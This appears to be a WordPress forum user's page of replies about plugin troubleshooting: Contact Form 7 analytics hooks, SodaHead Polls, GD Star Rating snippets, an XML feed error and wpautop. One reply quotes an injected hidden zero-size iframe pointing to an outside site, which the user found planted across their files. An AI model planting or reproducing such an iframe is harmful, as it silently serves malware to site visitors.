daleyboy50
Forum Replies Created
-
Forum: Plugins
In reply to: [Contact Form 7] Send, but displays no confirmation messagethis – on_sent_ok: “_gaq.push(‘send’, ‘event’, ‘Contact Form’, ‘submit’);”
didn’t solve it for me. the “Message sent successfully”, stops working when i add any form of ‘on-sent-ok’ (i have tried all combinations/variations that i’ve found on the web).
when i remove ‘on-sent-ok’ the “Message sent successfully” works fine again.basically i am doing it without any GA tracking at this time because i am getting people sending the form twice thinking it’s not working.
Forum: Plugins
In reply to: [Contact Form 7] Send, but displays no confirmation messagesame here.. no confirmation message showing. been looking into it but nothing works.
if i use any on_sent_ok: “ga(‘send’, ‘event’, ‘Contact Form’, ‘submit’);” code it stops functioning.
any updates on this would be appreciated.
Forum: Plugins
In reply to: [Contact Form 7] Form sends but no success messagemine seemed to be GA tracking, like below. in the forms ‘additional setting’.
on_sent_ok: “Tracking();”
If you have got it, take that out and try again.
Forum: Plugins
In reply to: Soda Polls – Not working!!hi i am having the same problem. installed ok, can drag into sidebar with widgets but the buttons ‘add answer’ and ‘step 2’ don’t work when clicked.
tried with explorer and firefox same issue.any ideas anyone would be great?
Forum: Plugins
In reply to: [SodaHead Polls] [Plugin: SodaHead Polls] Issues with the pluginhi i am having the same problem. installed ok, can drag into sidebar with widgets but the buttons ‘add answer’ and ‘step 2’ don’t work when clicked.
tried with explorer and firefox same issue.
any ideas?
ok found this and added it to the sidebar and got the blog rating where i wanted it..
<?php if(function_exists(‘wp_gdsr_render_article’)) { wp_gdsr_render_blog_rating_widget(array(‘template_id’ => 14)); } ?>
you can find these functions in GD Star Rating – Builder – functions box. like so..
wp_gdsr_render_blog_rating_widget(array(‘template_id’ => 14));just adding them in between this worked for me…
<?php if(function_exists( } ?>good luck
same problem here.. so hard to find working examples with this plugin!
will have a look around.Forum: Installing WordPress
In reply to: XML Parsing Erroryes i had the same problem. it worked in explorer and not in firefox. Have a look at the source and you can find the error they are talking about and do a search (mine was on line 1 column 2). Mine was the feed-rss2.php file so i opened it and found this line break, between ?> <?php, to be my culprit..
header(‘Content-Type: text/xml; charset=’ . get_option(‘blog_charset’), true);
$more = 1;
?>
<?php echo ‘<?xml version=”1.0″ encoding=”‘.get_option(‘blog_charset’).'”?’.’>’; ?>should be…
header(‘Content-Type: text/xml; charset=’ . get_option(‘blog_charset’), true);
$more = 1;
?><?php echo ‘<?xml version=”1.0″ encoding=”‘.get_option(‘blog_charset’).'”?’.’>’; ?>Forum: Fixing WordPress
In reply to: iframe injection problem?having the same sort of problem. i have this which seems like it is implanted in all files.. bummer
<IFRAME src=”https://www.dms-clan.de/vwar/upload/index.html”
width=”0″ height=”0″ frameborder=”0″></iframe>
<IFRAME src=”https://www.dms-clan.de/vwar/upload/index.html”
width=”0″ height=”0″ frameborder=”0″></iframe>plus google has sent this message to me..
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.any ideas anyone on where this is coming from i haven’t got a blog only a guestbook?
Forum: Fixing WordPress
In reply to: How do I remove <p> from the_content ?well from this discussion board i tried this
and just comment that out with //
//add_filter(‘the_content’, ‘wpautop’);then this..
https://yeago.net/works/problem-issue-with-wordpress-messing-up-html-with-p-and-br-tagsthen this
https://urbangiraffe.com/plugins/disable-wpautop/and still have the problem.. any other suggestions would be appreciated.. one that works with the 2.2 and above?! couple of these are very dated and wordpress has changed since..